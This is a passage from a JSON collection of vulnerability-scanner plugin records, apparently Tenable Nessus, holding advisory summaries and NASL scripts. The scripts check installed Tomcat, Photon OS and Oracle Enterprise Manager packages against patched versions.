{'osver': '16.04', 'pkgname': 'libservlet3.1-java', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'libtomcat8-java', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8-admin', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8-common', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8-examples', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8-user', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '18.04', 'pkgname': 'libservlet3.1-java', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'libtomcat8-embed-java', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'libtomcat8-java', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8-admin', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8-common', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8-examples', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8-user', 'pkgver': '8.5.30-1ubuntu1.2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libservlet3.0-java / libservlet3.1-java / libtomcat7-java / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:32:05", "description": "Several issues were discovered in the Tomcat servlet and JSP engine, which could result in session fixation attacks, information disclosure, cross-site scripting, denial of service via resource exhaustion and insecure redirects.", "cvss3": {}, "published": "2019-12-30T00:00:00", "type": "nessus", "title": "Debian DSA-4596-1 : tomcat8 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563"], "modified": "2023-02-23T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "p-cpe:/a:debian:debian_linux:tomcat8"], "id": "DEBIAN_DSA-4596.NASL", "href": "https://www.tenable.com/plugins/nessus/132427", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4596. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132427);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/23\");\n\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8014\", \"CVE-2019-0199\", \"CVE-2019-0221\", \"CVE-2019-12418\", \"CVE-2019-17563\");\n script_xref(name:\"DSA\", value:\"4596\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Debian DSA-4596-1 : tomcat8 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several issues were discovered in the Tomcat servlet and JSP engine,\nwhich could result in session fixation attacks, information\ndisclosure, cross-site scripting, denial of service via resource\nexhaustion and insecure redirects.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4596\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the tomcat8 packages.\n\nFor the oldstable distribution (stretch), these problems have been\nfixed in version 8.5.50-0+deb9u1. This update also requires an updated\nversion of tomcat-native which has been updated to 1.2.21-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.1-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libtomcat8-embed-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libtomcat8-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-admin\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-common\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-docs\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-examples\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-user\", reference:\"8.5.50-0+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:58", "description": "An update of 'apache-tomcat', 'binutils' packages of Photon OS has been released.", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Apache / Binutils PHSA-2018-1.0-0154 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10372", "CVE-2018-10535", "CVE-2018-6759", "CVE-2018-6872", "CVE-2018-7568", "CVE-2018-7569", "CVE-2018-7642", "CVE-2018-8014", "CVE-2018-8945"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:apache", "p-cpe:/a:vmware:photonos:binutils", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0154.NASL", "href": "https://www.tenable.com/plugins/nessus/111938", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0154. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111938);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\n \"CVE-2018-6759\",\n \"CVE-2018-6872\",\n \"CVE-2018-7568\",\n \"CVE-2018-7569\",\n \"CVE-2018-7642\",\n \"CVE-2018-8014\",\n \"CVE-2018-8945\",\n \"CVE-2018-10372\",\n \"CVE-2018-10535\"\n );\n\n script_name(english:\"Photon OS 1.0: Apache / Binutils PHSA-2018-1.0-0154 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of 'apache-tomcat', 'binutils' packages of Photon OS has\nbeen released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-1.0-154\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62848874\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:binutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"apache-tomcat-8.5.31-2.ph1\",\n \"binutils-2.30-5.ph1\",\n \"binutils-debuginfo-2.30-5.ph1\",\n \"binutils-devel-2.30-5.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache / binutils\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:27:31", "description": "The version of Oracle Application Testing Suite installed on the remote host is affected by multiple vulnerabilities : \n\n - Enterprise Manager Base Platform Agent Next Gen (Jython) component of Oracle Enterprise Manager Products Suite is easily exploited and can allow an unauthenticated attacker the ability to takeover the Enterprise Manager Base Platform. (CVE-2016-4000)\n\n - Enterprise Manager Base Platform Discovery Framework (OpenSSL) component of Oracle Enterprise Manager Products Suite is easily exploited and can allow an unauthenticated attacker the ability to cause a frequent crash (DoS) of the Enterprise Manager Base Platform. (CVE-2018-0732)\n\n - Enterprise Manager Ops Center Networking (OpenSSL) component of Oracle Enterprise Manager Products Suite is easily exploited and can allow an unauthenticated attacker the ability to cause a frequent crash (DoS) of the Enterprise Manager Ops Center Platform. (CVE-2018-0732)\n\n - Oracle Application Testing Suite Load Testing for Web Apps (Spring Framework) component of Oracle Enterprise Manager Products Suite is easily exploited and can allow an unauthenticated attacker the ability to takeover the Enterprise Manager Base Platform. (CVE-2018-1258)\n\n - Enterprise Manager Base Platform EM Console component is easily exploited by an unauthenticated attacker. Successful attacks can result in unauthorized update, insert, or delete access. (CVE-2018-3303)\n\n - Oracle Application Testing Suite Load Testing for Web Apps component is easily exploited by an unauthenticated attacker. Successful attacks can result in unauthorized update, insert, or delete access and a partial denial of service. (CVE-2018-3304)\n\n - Oracle Application Testing Suite Load Testing for Web Apps component is easily exploited by an unauthenticated attacker. Successful attacks can result in unauthorized update, insert, or delete access and a partial denial of service. (CVE-2018-3305)\n\n - Enterprise Manager for Virtualization Plug-In Lifecycle (jackson-databind) component of Oracle Enterprise Manager allows an unauthenticated attacker the ability to takeover Enterprise Manager for Virtualization. (CVE-2018-12023)\n\n - Enterprise Manager for Virtualization Plug-In Lifecycle (jackson-databind) component of Oracle Enterprise Manager allows an unauthenticated attacker the ability to takeover Enterprise Manager for Virtualization. (CVE-2018-14718)\n\n - Enterprise Manager Ops Center Networking (cURL) component of Oracle Enterprise Manager allows an unauthenticated attacker the ability to takeover Enterprise Manager Ops Center. (CVE-2018-1000300)", "cvss3": {}, "published": "2019-01-21T00:00:00", "type": "nessus", "title": "Oracle Application Testing Suite Multiple Vulnerabilities (Jan 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2016-4000", "CVE-2018-0732", "CVE-2018-1000300", "CVE-2018-12023", "CVE-2018-1258", "CVE-2018-14718", "CVE-2018-3303", "CVE-2018-3304", "CVE-2018-3305"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:application_testing_suite"], "id": "ORACLE_OATS_CPU_JAN_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/121257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121257);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-9251\",\n \"CVE-2016-4000\",\n \"CVE-2018-0732\",\n \"CVE-2018-1258\",\n \"CVE-2018-3303\",\n \"CVE-2018-3304\",\n \"CVE-2018-3305\",\n \"CVE-2018-12023\",\n \"CVE-2018-14718\",\n \"CVE-2018-1000300\"\n );\n script_bugtraq_id(\n 104207,\n 104222,\n 104442,\n 105647,\n 105658,\n 105659,\n 106601,\n 106615,\n 106618\n );\n\n script_name(english:\"Oracle Application Testing Suite Multiple Vulnerabilities (Jan 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web application installed that is affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Application Testing Suite installed on the\nremote host is affected by multiple vulnerabilities : \n\n - Enterprise Manager Base Platform Agent Next Gen (Jython) \n component of Oracle Enterprise Manager Products Suite is easily \n exploited and can allow an unauthenticated attacker the ability\n to takeover the Enterprise Manager Base Platform. (CVE-2016-4000)\n\n - Enterprise Manager Base Platform Discovery Framework (OpenSSL) \n component of Oracle Enterprise Manager Products Suite is easily \n exploited and can allow an unauthenticated attacker the ability\n to cause a frequent crash (DoS) of the Enterprise Manager Base \n Platform. (CVE-2018-0732)\n\n - Enterprise Manager Ops Center Networking (OpenSSL) component of\n Oracle Enterprise Manager Products Suite is easily exploited \n and can allow an unauthenticated attacker the ability to cause a \n frequent crash (DoS) of the Enterprise Manager Ops Center\n Platform. (CVE-2018-0732)\n\n - Oracle Application Testing Suite Load Testing for Web Apps \n (Spring Framework) component of Oracle Enterprise Manager \n Products Suite is easily exploited and can allow an \n unauthenticated attacker the ability to takeover the Enterprise \n Manager Base Platform. (CVE-2018-1258)\n\n - Enterprise Manager Base Platform EM Console component is easily \n exploited by an unauthenticated attacker. Successful attacks \n can result in unauthorized update, insert, or delete access. \n (CVE-2018-3303)\n\n - Oracle Application Testing Suite Load Testing for Web Apps\n component is easily exploited by an unauthenticated attacker. \n Successful attacks can result in unauthorized update, insert, or \n delete access and a partial denial of service. (CVE-2018-3304)\n\n - Oracle Application Testing Suite Load Testing for Web Apps\n component is easily exploited by an unauthenticated attacker. \n Successful attacks can result in unauthorized update, insert, or \n delete access and a partial denial of service. (CVE-2018-3305)\n\n - Enterprise Manager for Virtualization Plug-In Lifecycle \n (jackson-databind) component of Oracle Enterprise Manager \n allows an unauthenticated attacker the ability to takeover \n Enterprise Manager for Virtualization. (CVE-2018-12023)\n\n - Enterprise Manager for Virtualization Plug-In Lifecycle \n (jackson-databind) component of Oracle Enterprise Manager \n allows an unauthenticated attacker the ability to takeover \n Enterprise Manager for Virtualization. (CVE-2018-14718)\n\n - Enterprise Manager Ops Center Networking (cURL) component of \n Oracle Enterprise Manager allows an unauthenticated attacker the \n ability to takeover Enterprise Manager Ops Center. \n (CVE-2018-1000300)\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?799b2d05\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2019 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-14718\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_testing_suite\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_application_testing_suite_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Application Testing Suite\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle Application Testing Suite\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^13\\.3\\.0\\.1\\.\")\n{\n fix_ver = \"13.3.0.1.301\";\n fix = \"29172225\";\n}\nelse if (version =~ \"^13\\.2\\.0\\.1\\.\")\n{\n fix_ver = \"13.2.0.1.240\";\n fix = \"29172233\";\n}\nelse if (version =~ \"^13\\.1\\.0\\.1\\.\")\n{\n fix_ver = \"13.1.0.1.427\";\n fix = \"29172239\";\n}\nelse \n{\n # flag all 12.5.0.3.x \n fix_ver = \"12.5.0.3.999999\";\n}\n\n# Vulnerble versions that need to patch\nif (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version;\n if (!isnull(fix)) \n {\n report += \n '\\n Required patch : ' + fix +\n '\\n';\n }\n else\n {\n report += \n '\\n Upgrade to 13.1.0.1 / 13.2.0.1 / 13.3.0.1 and apply the ' +\n 'appropriate patch according to the January 2019 Oracle ' +\n 'Critical Patch Update advisory.' +\n '\\n';\n }\n security_report_v4(extra:report, port:0, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T16:16:03", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in Enterprise Manager Base Platform component:\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework) is easily exploited and may allow an unauthenticated, remote attacker to takeover the Enterprise Manager Base Platform.\n (CVE-2018-1258, CVE-2018-11039, CVE-2018-11040, CVE-2018-1257, CVE-2018-15756)\n\n - Agent Next Gen (IBM Java) vulnerability allows unauthenticated, remote attacker unauthorized access to critical data or complete access to all Enterprise Manager Base Platform accessible data. (CVE-2018-1656, CVE-2018-12539)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential for a side-channel timing attack. An unauthenticated attacker can exploit this to disclose potentially sensitive information. (CVE-2018-0734, CVE-2018-0735, CVE-2018-5407)", "cvss3": {}, "published": "2019-04-18T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Apr 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0734", "CVE-2018-0735", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-12539", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-15756", "CVE-2018-1656", "CVE-2018-5407"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_APR_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/124157", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124157);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-0734\",\n \"CVE-2018-0735\",\n \"CVE-2018-1257\",\n \"CVE-2018-1258\",\n \"CVE-2018-1656\",\n \"CVE-2018-5407\",\n \"CVE-2018-11039\",\n \"CVE-2018-11040\",\n \"CVE-2018-12539\",\n \"CVE-2018-15756\"\n );\n script_bugtraq_id(\n 104222,\n 104260,\n 105118,\n 105126,\n 105703,\n 105750,\n 105758,\n 105897\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0130\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Apr 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in\nEnterprise Manager Base Platform component:\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework)\n is easily exploited and may allow an unauthenticated, remote attacker to takeover\n the Enterprise Manager Base Platform.\n (CVE-2018-1258, CVE-2018-11039, CVE-2018-11040, CVE-2018-1257, CVE-2018-15756)\n\n - Agent Next Gen (IBM Java) vulnerability allows unauthenticated, remote attacker\n unauthorized access to critical data or complete access to all Enterprise Manager\n Base Platform accessible data. (CVE-2018-1656, CVE-2018-12539)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential\n for a side-channel timing attack. An unauthenticated attacker can exploit\n this to disclose potentially sensitive information. \n (CVE-2018-0734, CVE-2018-0735, CVE-2018-5407)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9166970d\");\n # https://support.oracle.com/rs?type=doc&id=2498664.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba7181fa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2019\nOracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1258\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('oracle_rdbms_cpu_func.inc');\ninclude('install_func.inc');\n\nproduct = 'Oracle Enterprise Manager Cloud Control';\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nemchome = install['path'];\n\npatchid = NULL;\nmissing = NULL;\npatched = FALSE;\nfix = NULL;\n\nif (version =~ '^13\\\\.3\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29433931';\n fix = '13.3.0.0.190416';\n}\nelse if (version =~ '^13\\\\.2\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29433916';\n fix = '13.2.0.0.190416';\n}\nelse if (version =~ '^12\\\\.1\\\\.0\\\\.5(\\\\.[0-9]+)?$')\n{\n patchid = '29433895';\n fix = '12.1.0.5.190416';\n}\n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\n# compare version to check if we've already adjusted for patch level during detection\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, product, version, emchome);\n\n# Now look for the affected components\npatchesinstalled = find_patches_in_ohomes(ohomes:make_list(emchome));\nif (isnull(patchesinstalled))\n missing = patchid;\nelse\n{\n foreach applied (keys(patchesinstalled[emchome]))\n {\n if (applied == patchid)\n {\n patched = TRUE;\n break;\n }\n else\n {\n foreach bugid (patchesinstalled[emchome][applied]['bugs'])\n {\n if (bugid == patchid)\n {\n patched = TRUE;\n break;\n }\n }\n if 